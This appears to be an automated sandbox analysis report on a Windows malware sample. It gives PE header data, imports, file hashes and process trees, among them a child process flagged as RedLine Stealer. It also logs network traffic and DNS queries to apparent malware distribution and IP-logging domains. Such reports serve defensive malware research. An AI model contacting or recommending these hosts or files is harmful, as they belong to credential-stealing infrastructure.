                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xad8300x18.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xad7780x40.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x940000x1c0.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                      Sections

                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                      .text0x10000x923a40x92400False0.462277978098data6.69759223127IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rdata0x940000x23fec0x24000False0.447469075521data5.5021877053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .data0xb80000x6eb00x4a00False0.156408361486DOS executable (block device driver)4.79179597438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rsrc0xbf0000x1e80x200False0.54296875data4.7720374017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .reloc0xc00000x781c0x7a00False0.610207479508data6.53625267801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                      RT_MANIFEST0xbf0600x188XML 1.0 document textEnglishUnited States
                                                                                                                                                                                      DLLImport
                                                                                                                                                                                      KERNEL32.dllCloseHandle, FindClose, lstrcatA, GetModuleHandleA, GlobalAlloc, lstrcpyA, VerSetConditionMask, GetModuleHandleW, WideCharToMultiByte, VerifyVersionInfoW, GetSystemTimeAsFileTime, IsWow64Process, GetComputerNameA, GetProcAddress, HeapFree, lstrlenA, LoadLibraryA, HeapAlloc, lstrcpynA, GetProcessHeap, GetLastError, CreateFileW, InitializeSListHead, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetCurrentProcess, TerminateProcess, FormatMessageW, SetCurrentDirectoryW, GetCurrentDirectoryW, CreateDirectoryW, DeleteFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetEndOfFile, SetFilePointerEx, SetLastError, MultiByteToWideChar, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, DecodePointer, GetCPInfo, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCurrentThread, GetThreadTimes, RtlUnwind, InterlockedPushEntrySList, RaiseException, FreeLibrary, LoadLibraryExW, GetFileType, ExitProcess, GetModuleHandleExW, SetEnvironmentVariableW, GetStdHandle, GetModuleFileNameW, WriteConsoleW, GetConsoleMode, ReadConsoleW, GetConsoleOutputCP, SetStdHandle, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, FlushFileBuffers, HeapReAlloc, OutputDebugStringW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapSize, WriteFile, AreFileApisANSI, ReadFile, SetEvent, ResetEvent, WaitForSingleObjectEx
                                                                                                                                                                                      USER32.dllCharToOemA, CharNextA
                                                                                                                                                                                      ADVAPI32.dllCryptGenRandom, CryptAcquireContextA, CryptReleaseContext, ConvertSidToStringSidA, LookupAccountNameA

                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Jun 23, 2021 22:22:12.758951902 CEST4973480192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:12.807333946 CEST8049734136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:12.807477951 CEST4973480192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:12.808789015 CEST4973480192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:12.855308056 CEST8049734136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:12.857131958 CEST8049734136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:12.898231983 CEST4973480192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:12.941346884 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:12.989520073 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:12.989677906 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:12.991138935 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:12.991163015 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.038400888 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.187236071 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.242085934 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.319396019 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.319448948 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.372992039 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.550034046 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.601419926 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.692172050 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.692251921 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:13.744101048 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.886945963 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:13.929610014 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.034775019 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.034848928 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.087647915 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.263699055 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.304601908 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.394797087 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.394851923 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.454699039 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.611418962 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.664123058 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.742743015 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.743294954 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:14.800044060 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.979079008 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.979101896 CEST8049735136.144.41.152192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:14.979311943 CEST4973580192.168.2.4136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:15.170106888 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.170304060 CEST4973980192.168.2.4185.20.227.194
                                                                                                                                                                                      Jun 23, 2021 22:22:15.171051979 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220037937 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220165968 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220931053 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.221046925 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.235958099 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.236948013 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.285470009 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.286046028 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.287184000 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.288018942 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293503046 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293535948 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293618917 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.294195890 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.337755919 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.338098049 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.338936090 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.339452982 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.340239048 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.345277071 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.346956015 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.347373009 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.347501040 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348433018 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.349195004 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.350653887 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.350815058 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.383908987 CEST8049741212.80.219.75192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384016991 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384155035 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384438992 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384495974 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389136076 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389381886 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389506102 CEST8049744162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389631987 CEST8049745162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389739990 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389796019 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389863014 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389868021 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.390624046 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.390717030 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.391261101 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.400698900 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.400835037 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401350975 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401511908 CEST804974389.221.213.3192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401654005 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.403125048 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.403331995 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428740978 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428786993 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428870916 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428987980 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.429785013 CEST8049744162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.429816961 CEST8049744162.159.134.233192.168.2.4

                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                      Jun 23, 2021 22:22:15.270683050 CEST192.168.2.48.8.8.80xcf30Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.272809982 CEST192.168.2.48.8.8.80x9d8Standard query (0)freeprivacytoolsforyou.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.277285099 CEST192.168.2.48.8.8.80xbdbStandard query (0)jom.diregame.liveA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.279337883 CEST192.168.2.48.8.8.80xb872Standard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.281922102 CEST192.168.2.48.8.8.80xf06aStandard query (0)nicepricingsaleregistration.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.282421112 CEST192.168.2.48.8.8.80x70caStandard query (0)pp.exeA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:16.290548086 CEST192.168.2.48.8.8.80xb872Standard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:16.641901970 CEST192.168.2.48.8.8.80xd2f2Standard query (0)d.dirdgame.liveA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:17.363445044 CEST192.168.2.48.8.8.80xb872Standard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:19.382400990 CEST192.168.2.48.8.8.80xb872Standard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:20.565454006 CEST192.168.2.48.8.8.80xb97bStandard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:21.571854115 CEST192.168.2.48.8.8.80xb97bStandard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:22.574953079 CEST192.168.2.48.8.8.80xb97bStandard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:24.622595072 CEST192.168.2.48.8.8.80xb97bStandard query (0)flamkravmaga.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:39.232224941 CEST192.168.2.48.8.8.80xd6abStandard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:51.609744072 CEST192.168.2.48.8.8.80xdf72Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:54.425018072 CEST192.168.2.48.8.8.80x7424Standard query (0)sergeevih43.tumblr.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:55.189569950 CEST192.168.2.48.8.8.80xf635Standard query (0)www.browzar.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:58.283819914 CEST192.168.2.48.8.8.80x4267Standard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:02.201591015 CEST192.168.2.48.8.8.80xabd7Standard query (0)sergeevih43.tumblr.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:03.275805950 CEST192.168.2.48.8.8.80x64a9Standard query (0)iplis.ruA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:03.970230103 CEST192.168.2.48.8.8.80xfbaStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:08.828871965 CEST192.168.2.48.8.8.80xe5a1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:12.174588919 CEST192.168.2.48.8.8.80xb4a2Standard query (0)uyg5wye.2ihsfa.comA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:20.169184923 CEST192.168.2.48.8.8.80xf5cdStandard query (0)g-partners.inA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:33.160851955 CEST192.168.2.48.8.8.80x6aa1Standard query (0)g-partners.topA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:46.861325979 CEST192.168.2.48.8.8.80x3ba0Standard query (0)email.yg9.meA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:46.862257957 CEST192.168.2.48.8.8.80xe18dStandard query (0)email.yg9.me28IN (0x0001)

                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                      Jun 23, 2021 22:22:15.332663059 CEST8.8.8.8192.168.2.40x9d8No error (0)freeprivacytoolsforyou.xyz212.80.219.75A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.342724085 CEST8.8.8.8192.168.2.40x70caName error (3)pp.exenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.343401909 CEST8.8.8.8192.168.2.40xbdbNo error (0)jom.diregame.live104.21.65.45A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.343401909 CEST8.8.8.8192.168.2.40xbdbNo error (0)jom.diregame.live172.67.158.82A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.346995115 CEST8.8.8.8192.168.2.40xf06aNo error (0)nicepricingsaleregistration.com89.221.213.3A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348798990 CEST8.8.8.8192.168.2.40xcf30No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348798990 CEST8.8.8.8192.168.2.40xcf30No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348798990 CEST8.8.8.8192.168.2.40xcf30No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348798990 CEST8.8.8.8192.168.2.40xcf30No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348798990 CEST8.8.8.8192.168.2.40xcf30No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:16.709765911 CEST8.8.8.8192.168.2.40xd2f2No error (0)d.dirdgame.live104.21.59.252A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:16.709765911 CEST8.8.8.8192.168.2.40xd2f2No error (0)d.dirdgame.live172.67.186.79A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:20.329885006 CEST8.8.8.8192.168.2.40xb872Server failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:21.341718912 CEST8.8.8.8192.168.2.40xb872Server failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:22.413284063 CEST8.8.8.8192.168.2.40xb872Server failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:24.433691978 CEST8.8.8.8192.168.2.40xb872Server failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:25.611881971 CEST8.8.8.8192.168.2.40xb97bServer failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:25.721184015 CEST8.8.8.8192.168.2.40xb97bServer failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:26.735915899 CEST8.8.8.8192.168.2.40xb97bServer failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:29.669856071 CEST8.8.8.8192.168.2.40xb97bServer failure (2)flamkravmaga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:39.287610054 CEST8.8.8.8192.168.2.40xd6abNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:51.667308092 CEST8.8.8.8192.168.2.40xdf72No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:51.667308092 CEST8.8.8.8192.168.2.40xdf72No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:54.486530066 CEST8.8.8.8192.168.2.40x7424No error (0)sergeevih43.tumblr.com74.114.154.22A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:54.486530066 CEST8.8.8.8192.168.2.40x7424No error (0)sergeevih43.tumblr.com74.114.154.18A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:55.266367912 CEST8.8.8.8192.168.2.40xf635No error (0)www.browzar.com139.59.176.201A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:22:58.333359957 CEST8.8.8.8192.168.2.40x4267No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:02.259687901 CEST8.8.8.8192.168.2.40xabd7No error (0)sergeevih43.tumblr.com74.114.154.22A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:02.259687901 CEST8.8.8.8192.168.2.40xabd7No error (0)sergeevih43.tumblr.com74.114.154.18A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:03.335768938 CEST8.8.8.8192.168.2.40x64a9No error (0)iplis.ru88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:04.036205053 CEST8.8.8.8192.168.2.40xfbaNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:04.036205053 CEST8.8.8.8192.168.2.40xfbaNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:08.893635035 CEST8.8.8.8192.168.2.40xe5a1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:12.241560936 CEST8.8.8.8192.168.2.40xb4a2No error (0)uyg5wye.2ihsfa.com88.218.92.148A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:20.233007908 CEST8.8.8.8192.168.2.40xf5cdName error (3)g-partners.innonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:33.768657923 CEST8.8.8.8192.168.2.40x6aa1No error (0)g-partners.top138.68.187.227A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:46.922393084 CEST8.8.8.8192.168.2.40x3ba0No error (0)email.yg9.me198.13.62.186A (IP address)IN (0x0001)

                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                      • 136.144.41.133
                                                                                                                                                                                      • 136.144.41.152
                                                                                                                                                                                      • freeprivacytoolsforyou.xyz
                                                                                                                                                                                      • nicepricingsaleregistration.com
                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                      • www.browzar.com
                                                                                                                                                                                      • 159.69.20.131
                                                                                                                                                                                      • https:
                                                                                                                                                                                        • 101.36.107.74
                                                                                                                                                                                      • uyg5wye.2ihsfa.com
                                                                                                                                                                                      • g-partners.top

                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                      Statistics

                                                                                                                                                                                      Behavior

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      System Behavior

                                                                                                                                                                                      Analysis Process: yevbZfdCqR.exe PID: 6872 Parent PID: 5892

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:11
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Desktop\yevbZfdCqR.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Desktop\yevbZfdCqR.exe'
                                                                                                                                                                                      Imagebase:0x1210000
                                                                                                                                                                                      File size:798208 bytes
                                                                                                                                                                                      MD5 hash:3568D61A49B61CE18BD6093748FFD32A
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      Registry Activities

                                                                                                                                                                                      Analysis Process: 9PWySv_SmMZ5POEp2PUJ_lbI.exe PID: 6000 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:433664 bytes
                                                                                                                                                                                      MD5 hash:9E78E5805208ADE76F61A62A8E42D763
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Analysis Process: ZteJ0k9a2sM9jXcC3SndaipD.exe PID: 5988 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
                                                                                                                                                                                      Wow64 process (32bit):true
